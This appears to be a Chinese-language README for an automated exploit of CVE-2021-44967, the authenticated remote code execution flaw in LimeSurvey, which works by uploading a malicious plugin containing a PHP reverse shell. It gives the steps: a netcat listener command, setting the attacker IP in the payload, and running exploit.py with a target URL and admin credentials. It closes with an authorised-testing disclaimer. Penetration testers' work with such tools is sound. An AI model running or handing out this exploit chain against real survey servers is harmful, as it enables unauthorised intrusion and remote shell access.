
🔥 Limesurvey 自动化 RCE 利用工具 (CVE-2021-44967)。优化的权限提升利用链。🚀
本仓库包含针对 CVE-2021-44967 的功能性漏洞利用程序,该漏洞是 LimeSurvey 中一个经过身份验证的远程代码执行漏洞。
已在以下版本上测试并确认可用:
该漏洞允许拥有管理员权限的已认证用户上传恶意插件。由于 LimeSurvey 未严格验证插件 ZIP 文件的内容,也未阻止插件目录中 PHP 文件的执行,攻击者可通过直接访问上传的 shell 实现 RCE。
config.xml,使其兼容 LimeSurvey 3.0 至 6.0 版本。在您的机器上启动 netcat 监听器:
nc -lvnp 443
编辑 php-rev.php,设置您的本地 IP 和端口:
$ip = '<YOUR_IP>';
$port = 443;
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>
示例:
python3 exploit.py http://10.129.1.243/survey admin test
exploit.py:主自动化脚本。php-rev.php:PHP 反弹 shell 有效载荷。config.xml:必需的 LimeSurvey 插件配置文件。本工具仅用于教育目的和授权安全测试。 严格用于受控、合法的环境(例如 CTF、实验室环境或授权渗透测试)。作者不对因使用本工具造成的任何滥用或损害负责。请负责任地使用,并仅对您拥有明确测试权限的系统进行操作。